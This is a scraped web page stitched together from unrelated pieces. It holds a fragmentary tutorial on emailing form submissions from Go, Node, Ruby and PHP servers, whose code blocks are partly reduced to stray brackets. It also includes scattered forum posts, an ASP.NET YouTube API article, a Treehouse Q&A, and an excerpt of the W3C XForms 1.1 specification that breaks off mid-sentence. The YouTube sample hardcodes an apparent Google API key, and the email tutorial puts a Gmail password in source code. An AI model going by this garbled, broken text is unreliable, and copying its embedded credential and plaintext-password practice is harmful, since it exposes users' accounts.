This sets a post route of
/api/message to run the function
postMessage(). At the end of the file, add this code:
// //. // } }
These two functions make up the handler for processing emails sent from the browser. The
/api/message route calls the
postMessage() function. It retrieves the information sent from the form filled in by the user, sanitizes the message with the BlueMonday library, and sends an email to the owner of the site using the
sendEmail() function. You will have to put your Gmail address in place of the
<your email address> holder and the password in the
<password> holder.
In the
goPress.go file, add this function after the
SetGetRoute() function:
// // Function: SetPostRoute // // Description: This function gives an // easy access to the // web variable setup in // this library. // // Inputs: // route Route to setup // handler Function to run that // route. // func SetPostRoute(route string, handler interface{}) { web.Post(route, handler) }
This function is exactly like the
SetGetRoute() function. The only difference is using the
web.Post() function.
With these changes, your goPress server can now send your emails from the user.
Processing the Form With nodePress
To send emails from node, you will need to first install the nodemailer library and the body-parser library with the following command line:
npm install --save nodemailer
npm install --save body-parser
Then you need to load the new libraries and configure the mailer object. At the top of the
nodePress.js file, after the last library loaded, add these lines:');
This will load the nodemailer library and set up the reusable component for sending emails. You have to replace
<your email name> with the name of your email address (i.e. before the @ symbol),
<your email domain> is the domain for your email address (i.e. gmail.com for normal gmail or your domain name if you have gmail set up on your domain name), and
After the line that initializes the nodePress variable, add this code:
// // Configure the body parser library. // nodePress.use(bodyParser.urlencoded({ extended: true }));
Now, after the last
nodePress.get() function call, add this code:")); }); });
This is the handler for the
/api/message address. This function gets the information sent from the form, creates the proper email message, and sends it to the email address given in
<your email address>. After sending the email, it will send the user to the
/messagesent page. The body parser middleware has the url parameters saved into the
request.body variable and properly sanitized.
This code works for Gmail setup without two-factor authentication. If you have two-factor authentication, you can refer to the Nodemailer documentation to set it up.
Processing the Form With rubyPress
To send emails in Ruby, you will need to install the ruby-gmail library with the following command line:
gem install ruby-gmail
Depending on your Ruby setup, you might need to use
sudo in front of the command. Now to load the library, add the following line to the top of the
rubyPress.rb file:
require 'gmail' #
After all the
get definitions, add the following lines:
With these additions, your rubyPress server can process email forms. Once you change
<your email address> to your email address and
<your password> to the password for your email server, the script is finished.
Processing the Form With phpPress
The last server to modify is the phpPress server. To add email capabilities to the server, I am going to install the phpmailer library. This is the most widely used library in PHP for working with emails. To install the library, you need to run these command-line commands in the phpPress directory:
composer update
composer require phpmailer/phpmailer
Unfortunately, the composer update will update the LightnCandy library. This is good because it is much faster and easier to use. But it breaks the server code. In the index.php file, locate the
ProcessPage() function and replace it with a version that uses the updated LightnCandy API.
Comparing it with the older code, you no longer have to work with a temporary file. It is all done in memory and is therefore much faster. Now, at the top of the
index.php file, add this after the Jade library:
// PHP Mailer:
require 'vendor/phpmailer/phpmailer/PHPMailerAutoload.php';
This loads the phpmailer library. Now, after the last
$app->get() function, add this code:
$mail->Subject = "Message from $Name";
$mail->Body = $Message;
if (!$mail->send()) {
    echo 'Message could not be sent.';
    echo 'Mailer Error: ' . $mail->ErrorInfo;
} else {
    $newResponse = SetBasicHeader($response);
    $newResponse->getBody()->write(page('messagesent'));
    return($newResponse);
}
});
This is a post request handler for the
/api/message path. It retrieves the form data sent from the browser, creates an email with it, and sends the email. PHP automatically takes any URL parameters and places them in the global $_GET array.
You will have to replace
<your name> and the other placeholders with the appropriate values for your email. If you are using something other than a Gmail SMTP server, you will need to change the
$mail->Host address as well.
Conclusion
The method I taught here posts the form data in the URL. Many sites nowadays use a REST API with the data as JSON.
Coz it's fun!
Discussions
Ignore this. I found that I can use "this" in the constructor; I was trying to do it outside of methods, i.e.:
public class Whatever
{
    private CustomList<X> list = new CustomList<X>(this);
}
This seems incredibly basic. I have a class and I want it to pass itself in a method, to set itself as an owner of a subclass.
How do you do this?
- spoofnozzle wrote.
For the price of the Playstation 3 you will be able to purchase both the XBox and Wii (wtf?) consoles.
See here:
This doesn't seem to have been getting an awful lot of attention!
Wakey, wakey, those who have access to Wallop.
I opened the Web Designer.
I closed Web Designer.
I opened Dreamweaver.
And that, my friends, is really all there is to it, although I'll give it another shot when I'm not loaded down with homework.
I am working on an experimental audio format in C#. Well, step one: communicate with the Windows audio stack. How can you implement this?
IsFile even returns false for "file://" protocol URIs?
Introduction
Embedding video players using pure HTML5 video technology can enhance Web page aesthetics and the overall user experience. YouTube is one of the most popular video sharing websites in the world. That's why, as with many popular Google services, YouTube also has a Data API. The YouTube API allows developers to interact with this service. By using this API, developers can query videos, search videos, and upload videos on YouTube.
In this article, I will demonstrate the coding technique for playing a YouTube video using an embed link. I will also demonstrate an example that consumes the YouTube API to get a list of videos from a channel.
Playing Embedded YouTube Videos in ASP.NET MVC
YouTube allows developers to retrieve the embed code of a video published in a YouTube channel. To get the embed code, you need to visit YouTube and find a video which you want to display. Copy the URL which is displayed in the browser address bar.
The following URL is a sample embedded YouTube video link:
To demonstrate the YouTube embed video feature from ASP.NET, I have created an MVC application from Visual Studio.
In the MVC application, I have appended the ID of the YouTube video to the YouTube embed video URL, which is ultimately assigned to an HTML IFRAME element in an ASP.NET MVC Razor view.
In the MVC View, I have added an HTML TextBox, a Button, and an IFRAME element.
The Button has been assigned to a jQuery click event handler. During the Button click event, first the YouTube Video URL will be fetched from the TextBox, and then YouTube Video ID is extracted from the URL.
The preceding extracted YouTube Video ID will be appended to the YouTube embed video URL. Finally, the URL is set to the SRC property of the HTML IFRAME element for audience view. The following code snippet explains the HTML view.
@{
    Layout = null;
}
<!DOCTYPE html>
<html>
<head>
    <meta name="viewport" content="width=device-width" />
    <title>Sample YouTube Embed Video Example</title>
</head>
<body>
    <input type="text" id="YoutubeUrl" style="width:300px" />
    <input type="button" id="PlayVideo" value="Play" />
    <hr />
    <iframe id="YouTubevideo" width="420" height="315" frameborder="0" style="display:none" allowfullscreen></iframe>
    <script type="text/javascript" src=" /jquery.min.js"></script>
    <script type="text/javascript">
        $("body").on("click", "#PlayVideo", function () {
            var url = $("#YoutubeUrl").val();
            url = url.split('v=')[1];
            $("#YouTubevideo")[0].src = "//" + url;
            $("#YouTubevideo").show();
        });
    </script>
</body>
</html>
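The click handler above extracts the video ID with url.split('v=')[1], which keeps anything after the ID when the URL carries extra query parameters (e.g. &t=30s). A slightly more defensive stand-alone version of the same extraction (the function name is mine, not from the article):

```javascript
// Extract the YouTube video ID from a watch URL, tolerating trailing parameters.
function extractYouTubeId(url) {
  var id = url.split('v=')[1] || '';
  var amp = id.indexOf('&');
  return amp === -1 ? id : id.substring(0, amp);
}
```

The handler could then build the IFRAME src from extractYouTubeId($("#YoutubeUrl").val()).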
The following MVC Controller code consists of an Action method named Index. Inside this Action method code, I have simply returned the View.
public class HomeController : Controller
{
    public ActionResult Index()
    {
        return View();
    }
}
Consuming the YouTube API
Google provides a YouTube Data API. This API allows developers to interact with the YouTube service and create various applications. To interact with YouTube API, you have to create a key.
To create a Google API key, follow these steps.
Step 1
You need to create an account with Google if you don't have one already. Once the account is created, you should navigate to the Google Developers Console Web site, as shown in Figure 1.
Figure 1: Enabling the YouTube Data API
Next, you should create a new project. I have already created a project named ‘MyCoolProject’ shown in the previous example.
Next, click the “Enable” button. This will lead you to a new page where you can enable all needed APIs.
Step 2
On the next page, enable “YouTube Data API v3” and “YouTube Analytics API.” In Figure 2, you can see YouTube Data API v3 is enabled.
Figure 2: YouTube Data API Statistics
Step 3
Generate the API key by clicking the ‘Credentials’ link. We will use the generated API Key in code (see Figures 3 and 4).
Figure 3: Generating a Data API Key
Figure 4: Data API Key Generated
Step 4
Now, create an ASP.NET MVC application from Visual Studio. Open the NuGet console and search for 'Google.Apis.YouTube.v3'. Install that package, as shown in Figure 5.
Figure 5: Installing the ‘Google.Apis.YouTube.v3’ NuGet Package
Once all packages are installed, the following Google and YouTube specific assemblies will be added to the reference folder (see Figure 6).
Figure 6: References are added in the Project
Step 5
Next, create a new class, YouTubeVideo, and add to it the code that calls the YouTube API.
The following GetVideos function is added to the YouTubeVideo class that returns all the videos (objects of the MyYouTubeVideoObject class) of a specific channel. I have used the API created in the previous step for calling the YouTube API.
namespace YouTubeAPISample
{
    public class MyYouTubeVideoObject
    {
        public string VideoId { get; set; }
        public string Title { get; set; }
    }

    public class YouTubeVideo
    {
        const string MYYOUTUBE_CHANNEL = "SampleChannel";
        const string MyYOUTUBE_DEVELOPER_KEY = "AIzaSyDsCC8-hnOokLB2qsBq3WnJXQ_9poKOBus";

        public static MyYouTubeVideoObject[] GetVideos()
        {
            YouTubeRequestSettings settings =
                new YouTubeRequestSettings("SampleChannel", MyYOUTUBE_DEVELOPER_KEY);
            YouTubeRequest request = new YouTubeRequest(settings);
            string feedUrl = String.Format("{0}/uploads?orderby=published", MYYOUTUBE_CHANNEL);
            Feed<Video> videoFeed = request.Get<Video>(new Uri(feedUrl));
            return (from video in videoFeed.Entries
                    select new MyYouTubeVideoObject()
                    {
                        VideoId = video.VideoId,
                        Title = video.Title
                    }).ToArray();
        }
    }
}
Conclusion
I hope this article explains how to interact with the YouTube service to display videos from a YouTube channel. You can use the preceding codebase to display a video list in your Web site. The YouTube Data API provides a rich set of features to interact with YouTube. That's all for today. Happy coding!
Wenqian Zheng2,286 Points
Package 1 of 4
In the task 'Let's create some code for the Example company. They own the domain example.com. Place the BlogPost.java file in the proper package by using the package keyword.'
I typed in package com.example;
and I kept getting the error message: 'JavaTester.java:65: error: illegal start of expression package com.example'
Could someone please tell me what to do? Thanks a lot!
package com.example;
public class Display {
    public static void main(String[] args) {
        // Your code here...
    }
}
1 Answer
Aleksander Henriksen3,059 Points
Hello.
You have done everything right; it's just the tracks in Treehouse that have some errors. Just keep moving on with your track, and skip the assignments until they have fixed the problem.
Wenqian Zheng2,286 Points
Thanks a lot. I'm kinda confused but I did move on. :) | https://teamtreehouse.com/community/package-1-of-4 | CC-MAIN-2020-40 | refinedweb | 150 | 70.9 |
Copyright © 2007 W3C® (MIT, ERCIM, Keio), All Rights Reserved. W3C liability, trademark and document use rules apply.
XForms is an XML application that represents the next generation of forms for the Web. XForms is not a free-standing document type, but is intended to be integrated into other markup languages, such as XHTML or ODF. This specification was developed by the W3C Forms Working Group as part of the Forms Activity within the W3C Interaction Domain.
This document is a W3C Candidate Recommendation. Publication as a Candidate Recommendation does not imply endorsement by the W3C Membership. This is a draft document and may be updated, replaced or obsoleted by other documents at any time. It is inappropriate to cite this document as other than work in progress.
The results of the public last call review of XForms 1.1 are presented in this last call comments report. There are no features at risk. The working group has prepared a preliminary implementation report to outline present and expected implementations of XForms 1.1. Also note that XForms 1.1 is based on XForms 1.0, which is widely implemented and deployed. For a description of the differences between XForms 1.1 and 1.0, see Section 1.5 Differences between XForms 1.1 and XForms 1.0.
Please send comments about this document to www-forms-editor@w3.org (with public archive). Please send discussion email to www-forms@w3.org.
1 About the XForms 1.1 Specification
1.1 Background
1.2 Reading the Specification
1.3 How the Specification is Organized
1.4 Documentation Conventions
1.5 Differences between XForms 1.1 and XForms 1.0
1.5.1 Model and Instance
1.5.2 Enhanced Submissions
1.5.3 Datatypes and Model Item Properties
1.5.4 Functions and XPath Expressions
1.5.5 User Interface
1.5.6 Actions and Events
2 Introduction to XForms
2.1 An Example
2.2 Providing XML Instance Data
2.3 Constraining Values
2.4 Multiple Forms per Document
3 Document Structure
3.1 Namespace for XForms Extension Module
3.4.1 The extension Element
3.5 The XForms MustUnderstand Module
4.3.1 The xforms-rebuild Event
4.3.2 The xforms-recalculate Event
4.3.3 The xforms-revalidate Event
4.3.4 The xforms-refresh Event
4.3.5 The xforms-reset Event
4.3.6 The xforms-next and xforms-previous Events
4.3.7 The xforms-focus Event
4.3.8 The xforms-help and xforms-hint Events
4.3.9 The xforms-submit Event
4.3.10 The xforms-submit-serialize Event
4.4 Notification Events
4.4.1 The xforms-insert Event
4.4.2 The xforms-delete Event
4.4.3 The xforms-value-changed Event
4.4.4 The xforms-valid Event
4.4.5 The xforms-invalid Event
4.4.6 The xforms-readonly Event
4.4.7 The xforms-readwrite Event
4.4.8 The xforms-required Event
4.4.9 The xforms-optional Event
4.4.10 The xforms-enabled Event
4.4.11 The xforms-disabled Event
4.4.12 The DOMActivate Event
4.4.13 The DOMFocusIn Event
4.4.14 The DOMFocusOut Event
4.4.15 The xforms-select and xforms-deselect Events
4.4.16 The xforms-in-range Event
4.4.17 The xforms-out-of-range Event
4.4.18 The xforms-scroll-first and xforms-scroll-last Events
4.4.19 The xforms-submit-done Event
4.5 Error Indications
4.5.1 The xforms-binding-exception Event
4.5.2 The xforms-compute-exception Event
4.5.3 The xforms-link-error Event
4.5.4 The xforms-link-exception Event
4.5.5 The xforms-output-error Event
4.5.6 The xforms-submit-error Event
4.5.7 The xforms-version-exception Event
4.7 Resolving ID References in XForms
4.7.1 References to Elements within a repeat Element
4.7.2 References to Elements within a bind Element
4.8 DOM Interface for Access to Instance Data
4.8.1 The getInstanceDocument() Method
4.8.2 The rebuild() Method
4.8.3 The recalculate() Method
4.8.4 The revalidate() Method
4.8.5 The refresh() Method
4.9 Feature string for the hasFeature method call
5 Datatypes
5.1 XML Schema Built-in Datatypes
5.2 XForms Datatypes
5.2.1 Additional XForms Datatypes to Allow Empty Content
5.2.2 xforms:listItem
5.2.3 xforms:listItems
5.2.4 xforms:dayTimeDuration
5.2.5 xforms:yearMonthDuration
5.2.6 xforms:email
5.2.7 xforms:card-number
7.2 Evaluation Context
7.3 References, Dependencies, and Dynamic Dependencies
7.4 Expression Categories
7.4.2 Model Binding Expressions and Computed Expressions
7.4.3 Expressions in Actions and Submissions
7.4.4 UI Expressions
7.4.5 UI Binding in other XML vocabularies
7.4.6 Binding Examples
7.5 The XForms Function Library
7.6 Boolean Functions
7.6.1 The boolean-from-string() Function
7.6.2 The is-card-number() Function
7.7 Number Functions
7.7.1 The avg() Function
7.7.2 The min() Function
7.7.3 The max() Function
7.7.4 The count-non-empty() Function
7.7.5 The index() Function
7.7.6 The power() Function
7.7.7 The random() Function
7.7.8 The compare() Function
7.8 String Functions
7.8.1 The if() Function
7.8.2 The property() Function
7.8.3 The digest() Function
7.8.4 The hmac() Function
7.9 Date and Time Functions
7.9.1 The local-date() Function
7.9.2 The local-dateTime() Function
7.9.3 The now() Function
7.9.4 The days-from-date() Function
7.9.5 The days-to-date() Function
7.9.6 The seconds-from-dateTime() Function
7.9.7 The seconds-to-dateTime() Function
7.9.8 The adjust-dateTime-to-timezone() Function
7.9.9 The seconds() Function
7.9.10 The months() Function
7.10 Node-set Functions
7.10.1 The instance() Function
7.10.2 The current() Function
7.10.3 The id() Function
7.10.4 The context() Function
7.11 Object Functions
7.11.1 The choose() Function
7.11.2 The event() Function
7.12 Extension Functions
8 Core Form Controls
8.1 The XForms Core Form Controls Module
8.1.1 Implementation Requirements Common to All Form Controls
8.1.2 The input Element
8.1.3 The secret Element
8.1.4 The textarea Element
8.1.5 The output Element
8.1.5.1 The mediatype Element (for output)
8.1.6 The upload Element
8.1.6.1 The filename Element
8.1.6.2 The mediatype Element (for upload)
8.1.7 The range Element
8.1.8 The trigger Element
8.1.9 The submit Element
8.1.10 The select Element
8.1.11 The select1 Element
8.2 Common Support Elements
8.2.1 The label Element
8.2.2 The help Element
8.2.3 The hint Element
8.2.4 The alert Element
8.3 Common Markup for Selection Controls
8.3.1 The choices Element
8.3.2 The item Element
8.3.3 The value Element
9 Container Form Controls
9.1 The XForms Group Module
9.1.1 The group Element
9.2 The XForms Switch Module
9.2.1 The switch Element
9.2.2 The case Element
9.3 The XForms Repeat Module
9.3.1 The repeat Element
9.3.2 Nested Repeats
9.3.3 Repeat Processing
9.3.4 User Interface Interaction
9.3.5 Creating Repeating Structures Via Attributes
9.3.6 The itemset Element
9.3.7 The copy Element
10 XForms Actions
10.1 The action Element
10.2 The setvalue Element
10.3 The insert Element
10.4 The delete Element
10.5 The setindex Element
10.6 The toggle Element
10.6.1 The case Element Child of the toggle Element
10.7 The setfocus Element
10.7.1 The control Element Child of the setfocus Element
10.8 The dispatch Element
10.8.1 The name Child Element
10.8.2 The target Child Element
10.8.3 The delay Child Element
10.9 The rebuild Element
10.10 The recalculate Element
10.11 The revalidate Element
10.12 The refresh Element
10.13 The reset Element
10.14 The load Element
10.14.1 The resource Element child of load
10.15 The send Element
10.16 The message Element
10.17 Conditional Execution of XForms Actions
10.18 Iteration of XForms Actions
10.19 Actions from Other Modules
11 The XForms Submission Module
11.1 The submission Element
11.2 The xforms-submit Event
11.3 The xforms-submit-serialize Event
11.4 The xforms-submit-done Event
11.5 The xforms-submit-error Event
11.6 The Submission Resource
11.6.1 The resource Element
11.7 The Submission Method
11.7.1 The method Element
11.8 The header Element
11.8.1 The name Element
11.8.2 The value Element
11.9 Submission Options
11.9.1 The get Submission Method
11.9.2 The post, multipart-post, form-data-post, and urlencoded-post Submission Methods
11.9.3 The put Submission Method
11.9.4 The delete Submission Method
11.9.5 Serialization as application/xml
11.9.6 Serialization as multipart/related
11.9.7 Serialization as multipart/form-data
11.9.8 Serialization as application/x-www-form-urlencoded
11.10 Replacing Data with the Submission Response
11.11 Integration with SOAP
11.11.1 Representation of SOAP Envelope
11.11.2 Indicating a SOAP submission
11.11.3 SOAP HTTP Binding
11.11.4 Handling the SOAP Response
12 Conformance
12.1 Conforming XForms Documents
12.2 Conforming XForms Generators
12.3 Base Technologies for XForms Processors
12.4 Conformance Levels
12.4.1 XForms Model
12.4.2 XForms Full
13 Glossary Of Terms
A References
A.1 Normative References
A.2 Informative References
B Insert and Delete Action Patterns for Data Mutations
B.1 Prepend Element Copy
B.2 Append Element Copy
B.3 Duplicate Element
B.4 Set Attribute
B.5 Remove Element
B.6 Remove Attribute
B.7 Remove Nodeset
B.8 Copy Nodeset
B.9 Copy Attribute List
B.10 Replace Element
B.11 Replace Attribute
B.12 Replace Instance with Insert
B.13 Move Element
B.14 Move Attribute
B.15 Insert Element into Non-Contiguous, Heterogeneous Nodeset
C Recalculation Sequence Algorithm
C.1 Details on Creating the Master Dependency Directed Graph
C.2 Details on Creating the Pertinent Dependency Subgraph
C.3 Details on Computing Individual Vertices
C.4 Example of Calculation Processing
D Privacy Considerations
D.1 Using P3P with XForms
E Input Modes (Non-Normative)
E.1 inputmode Attribute Value Syntax
E.2 User Agent Behavior
E.3 List of Tokens
E.3.1 Script Tokens
E.3.2 Modifier Tokens
E.4 Relationship to XML Schema pattern facets
E.5 Examples
F Schema for XForms (Non-Normative)
F.1 Schema for XML Events
G XForms and Styling (Non-Normative)
G.1 Pseudo-classes
G.2 Pseudo-elements
G.3 Examples
H Complete XForms Examples (Non-Normative)
H.1 XForms in XHTML
H.2 Editing Hierarchical Bookmarks Using XForms
H.3 Survey Using XForms and SVG
I Acknowledgements (Non-Normative)
J Production Notes (Non-Normative)
Forms are an important part of the Web, and they continue to be the primary means for enabling interactive Web applications. The key words must, must not, required, shall, shall not, recommended, should, should not, may, and optional in this specification are to be interpreted as described in [RFC 2119]. The appendices provide an XML Schema description of XForms, references, examples, and other useful information.
Throughout this document, the following namespace prefixes and corresponding namespace identifiers are used:
xforms: The XForms namespace, http://www.w3.org/2002/xforms (see 3.1 Namespace for XForms)
html: An XHTML namespace, e.g. http://www.w3.org/1999/xhtml (see [XHTML 1.0])
xs: The XML Schema namespace, http://www.w3.org/2001/XMLSchema (see [XML Schema part 1])
xsd: The XML Schema namespace, http://www.w3.org/2001/XMLSchema (see [XML Schema part 2])
This document uses the following markup for additional commentary:
Note:
A gentle explanation to readers.
This informative section provides an overview of the new features and changed behaviors available in XForms 1.1.
The
model element now supports a
version attribute to help authors bridge the transition between XForms 1.0 to XForms 1.1.
The
instance element now has a
resource attribute that allows instance data to be obtained from a URI only if the instance
does not already contain data. By contrast, the
src attribute overrides the inline content in an
instance. The
resource
attribute is more useful in systems that must support save and reload of XForms-based documents.
The
submission element offers many new features that allow significantly improved data communications capabilities for XForms, including:
Access to SOAP-based web services, RESTful services, ATOM-based services, and non-XML services
Improved control over submission processing and serialization
Ability to control the submission URI and headers with instance data
Targetted instance data replacement capabilities
The
submission element now has a
resource attribute and
resource child element that allow the instance data to dynamically control
the submission URI. As a result, the
action attribute is deprecated, though still supported in XForms 1.1.
In XForms 1.0, submissions were already more capable than AJAX, based on the ability to automatically update a form with results from HTTP and HTTPS services, including RSS feeds.
In XForms 1.1, the
method attribute now supports
delete as well as any other QName.
The
method child element also allows the method to be dynamically controlled by instance data.
Submission headers can now be added, and even dynamically controlled by instance data, using the
header child element.
These features complete the capabilities needed for ATOM and RESTful services. XForms 1.1 also offers special submission header behavior through the
mediatype
attribute to allow communications with SOAP 1.1 and 1.2 web services.
The
submission element now supports attributes
relevant and
validate, which allow form authors to turn off instance data relevance pruning
and validity checking. This allows
submission to be used to save and reload unfinished data on a server or the local file system.
The
submission element now supports the
target attribute, which allows partial instance replacement by identifying a node to be replaced with the
submission result. The
replace attribute also now supports a
text setting, which allows the content of the target node, rather than the target node itself, to be
replaced with a non-XML (text) submission result.
The
submission element now also supports the
xforms-submit-serialize event, which allows the form author to provide a custom serialization,
such as plain text or the full XForms document, as the submission data. The
serialization attribute also provides increased control over the submission data
serialization, including the setting
none, which allows
submission to be used for simple URI activation.
The
xforms-submit-done and
xforms-submit-error events now have event context information available that provide more information
about both successful and failed submissions, such as the response headers of successful submissions and the reason code for failed submissions.
Finally, over a dozen new examples have been added to illustrate
submission usage.
XForms 1.1 now offers
card-number datatypes so form authors can easily validate email address and credit card number input values.
To further simplify authoring, XForms 1.1 now also provides its own definitions of the XML Schema datatypes, except the XForms versions permit the empty string. Allowing empty
string means that input like an age or a birthdate can be collected without being required input for validity (an empty string is not in the lexical space of XML schema datatypes like
xsd:positiveInteger and
xsd:date). If an input is required, the form author can still use the XForms versions of the datatypes in combination with the
required model item property. The XForms datatypes also aid authoring by allowing type definitions to omit namespace qualification, e.g.
type="date"
rather than
type="xsd:date", if the default namespace of the model is set to XForms.
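The difference between the two lexical spaces is easy to see with a small validity check. This sketch mimics a simplified date datatype in plain JavaScript (real xsd:date also allows an optional timezone, omitted here): the XML Schema flavor rejects the empty string, while the XForms flavor admits it.

```javascript
// Simplified lexical test for YYYY-MM-DD (timezone part of xsd:date omitted).
var ISO_DATE = /^\d{4}-\d{2}-\d{2}$/;

// xsd:date semantics: the empty string is not in the lexical space.
function isXsdDate(value) {
  return ISO_DATE.test(value);
}

// xforms:date semantics: same lexical space plus the empty string.
function isXFormsDate(value) {
  return value === '' || ISO_DATE.test(value);
}
```

An empty, optional birthdate field therefore stays valid when typed as xforms:date, while the required model item property can still force it to be filled in.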
The
readonly model item property was defined to be an inviolate property of the data model. This means it cannot be violated by anything outside of the model item property system,
including not just form controls but also XForms actions and instance data access from the DOM interface.
XForms 1.1 now contains many new functions that can be used in
calculate and other XPath expressions to enable numerous features, including:
basic date math and working with local dates and times:
local-date(),
local-dateTime(),
days-to-date(),
seconds-to-dateTime(), and
adjust-dateTime-to-timezone()
working with tabular data and parallel lists:
current(),
choose() and
context()
basic security capabilities:
digest(),
hmac(), and
random()
improved numeric and string processing:
power(),
is-card-number(), and
compare()
search across instances of a model: two parameter
id() function
access to context information added to many XForms events:
event()
The specification now provides a better classification of binding expression types as well as a more rigorous definition for dynamic dependencies.
These definitions ensure that XPath expressions in form controls and actions which use the
index() are automatically re-evaluated when appropriate.
Due to the addition of the
choose() function, the
if() function is still supported but deprecated as futureproofing against the
conflict with the
if keyword in XPath 2.0.
The behavioral description common to all form controls has been improved to indicate default layout styling and rendering requirements for required data.
The
output form control has been improved to render non-text mediatypes, particularly images, obtained from instance data.
An example was added to show the use of a
DOMActivate handler on an
input to automatically initiate a submission
once a user enters and commits input, such as a search query.
The processing model and implementation requirements on selection controls were elaborated upon to ensure consistency of behavior between selection data expressed as textual lists versus element lists.
The ability to create wizard-like interfaces with dynamically available form controls has been improved. Details are in the description of improvements to actions.
The specification provides more rigorous definitions and classifications of form controls, which have been applied throughout the specification to ensure proper support of varied features related to form controls, such as events, applicability of model item properties, and focusability.
The XForms repeat has been made more powerful and flexible. The specification now provides rigorous definitions and processing model descriptions for
repeated content, including creation, destruction, IDREF resolution and event flow between repeated content and the containing content (which may itself be repeated).
The
repeat is now capable of operating over any nodeset, not just a homogeneous collection. A formal processing model for repeat index handling has been defined.
The
insert and
delete actions have been converted from specialized actions associated with
repeat to generalized data insertion and
deletion operations. An entire appendix of 15 examples was added to illustrate this additional capability in detail.
All XForms actions, as well as sets of actions, can be executed conditionally or iteratively. Combined with the generalized
insert and
delete,
this means that the information processing power of XForms 1.1 is Turing-complete.
The
dispatch action now allows the event name and target to be specified by instance data. A new attribute,
delay, has also been added
to allow an event to be scheduled for dispatch at a later time. Since the event handler for the event can schedule the same event for later dispatch, it is possible
in XForms 1.1 to create background daemon tasks.
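The daemon pattern is simply an event whose handler re-dispatches the event that invoked it with a fresh delay. The toy scheduler below models the processor's delayed-dispatch queue in plain JavaScript; the scheduler itself is illustrative, not part of XForms:

```javascript
// Toy stand-in for the processor's delayed-dispatch queue.
function makeScheduler() {
  var queue = [];
  return {
    dispatch: function (name, delay, handler) {
      queue.push({ name: name, delay: delay, handler: handler });
    },
    // Deliver the next pending event, as the processor would when its delay expires.
    runNext: function () {
      var ev = queue.shift();
      if (ev) ev.handler(ev);
      return ev ? ev.name : null;
    }
  };
}

// A "daemon": each delivery re-dispatches the same event, like a
// <dispatch name="tick" delay="1000" .../> placed inside the tick handler.
var ticks = 0;
var sched = makeScheduler();
function onTick(ev) {
  ticks += 1;
  sched.dispatch('tick', 1000, onTick); // reschedule itself
}
sched.dispatch('tick', 1000, onTick);
```

Because the handler always leaves one pending dispatch behind, the task keeps running until something stops rescheduling it.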
The
setfocus and
toggle have been improved to help with creating wizard interfaces and handling dynamically available content.
The control to focus and the case to select can now be specified by instance data. These actions have also been improved relative to the recalculation processing model.
They now perform deferred updates before their regular processing to ensure the user interface is automatically refreshed.
As part of the improvement to repeat index management, the
setindex action now behaves more like
setvalue, which means it
now sets the flags for automatic recalculation, revalidation and user interface refresh. As well, this action now also performs deferred updates before its
regular processing to ensure the user interface is up to date.
Finally, the
setvalue action has been improved due to the addition of the
context() function. Now it is possible to express the
value attribute in terms of the same context node used to evaluate the single node binding. This improves the ability to use
setvalue
inside of a
repeat to set values of instance nodes that are outside of the repeat nodeset based on values that are within the repeat nodeset.
In the example, the
relevant expression uses absolute XPath notation (beginning with
/) because the evaluation context nodes for computed expressions are determined by the binding expression (see 7.2 Evaluation Context).
The namespace URI for XForms is http://www.w3.org/2002/xforms. The XForms schema has the target namespace specified and as such is compatible with the XForms 1.0 definition.
The <switch xmlns="http://www.w3.org/2002/xforms"> example is unchanged from the specification in XForms 1.0 (in the example, the prefixes html and ev are defined by an ancestor of the
switch element).
The Common Attribute Collection applies to every element in the XForms namespace.
Foreign attributes are allowed on all XForms elements.
The optional
id attribute of type
xsd:ID assigns an identity to the containing element.
Note:
Elements can be identified using any attribute of type ID (such as
xml:id), not just the
id attribute defined above.
A failed link traversal causes the XForms processor to dispatch xforms-link-exception or xforms-link-error to the
model associated with the in-scope evaluation context node of the element that bears the Linking
Attributes Collection for the failed link.
Note:
Section 3.3.2 The instance Element defines attribute
src for the
instance element.
The following attributes define a binding between an XForms element, such as a form control or an action, and an instance data node. When an element is defined to have a Single-Node Binding, the Single-Node Binding is required unless the element explicitly states that it is optional.
In some cases, an XForms element may allow a Single-Node Binding, but one or more attributes in the Single-Node Binding attribute group are inappropriate for that XForms element. In such cases, the exact attributes are listed for the XForms element, but those attributes still express a Single-Node Binding if they appear in the element. For example, the
submission element forbids the
model attribute because the model is defined to be the one containing the
submission, so the attributes
ref and
bind are listed for
submission rather than referring to the Single-Node Binding attribute group, but if a
ref or
bind attribute is used on a
submission, it does express a Single-Node Binding.
When the Single-Node Binding is required, one of
ref or
bind is required.
When
bind is used, the node is determined by the referenced
bind.
See 4.7.2 References to Elements within a bind Element for details on selecting an identified
bind that is iterated by one or more containing
bind elements.
When
ref is used, the node is determined by evaluating the XPath expression with the evaluation context described in Section 7.2 Evaluation Context.
First-node rule: When a Single-Node Binding attribute selects a node-set of size > 1, the first node in the node-set, based on document order, is used.
The following attributes define a binding between an XForms element such as a form control or an action and a node-set. If an XForms element is defined by Node-Set Binding, then the Node-Set Binding is required unless the element explicitly states that it is optional.
In some cases, an XForms element may allow a Node-Set Binding, but one or more attributes in the Node-Set Binding attribute group are inappropriate for that XForms element. In such cases, the exact attributes are listed for the XForms element, but those attributes still express a Node-Set Binding if they appear in the element. For example, the
bind element only allows the
nodeset attribute. The
model and
bind attributes are not allowed on a
bind element, but if the
nodeset attribute appears on a
bind element, it does express a Node-Set Binding.
When the Node-Set Binding is required, one of
nodeset or
bind is required.
When
bind is used, the node-set is determined by the referenced
bind.
See 4.7.2 References to Elements within a bind Element for details on selecting an identified
bind that is iterated by one or more containing
bind elements.
When
nodeset is used, the node-set is determined by evaluating the XPath expression with the evaluation context described in Section 7.2 Evaluation Context.
Note that the presence of foreign namespaced elements is subject to the definition of the containing or compound.
The schema definitions for a namespace are determined to be applicable to instance nodes based on an instance schema validation episode initialized to lax processing. When an element lacks a schema declaration, the XML Schema specification defines the recursive checking of children and attributes as optional. For this specification, this recursive checking is required. Schema processing for a node with matching schema declarations is governed by its content processing definition, which is strict by default.
Note:
The
schema list may include URI fragments referring to elements located elsewhere in the
containing document; e.g.
"#myschema".
xs:schema elements located inside the current model need not be listed.
Optional attribute with a default value of empty string and legal values defined by the datatype xforms:versionList. Examples are
"1.0" and
"1.0 1.1". If one or more versions are indicated by this attribute on the default
model, then an XForms Processor must support at least one of the listed language versions of XForms. Otherwise, the XForms Processor must terminate processing after dispatching the event xforms-version-exception to the default
model. If the XForms Processor supports more than one language version indicated by the version setting on the default
model or if the version setting on the default
model is empty string (whether specified or by default), then the XForms Processor may execute the XForms content using any language conformance level available to it. If any non-default
model has a version setting that is incompatible with the language version selected by the XForms Processor for the default
model, or if any
model contains an illegal
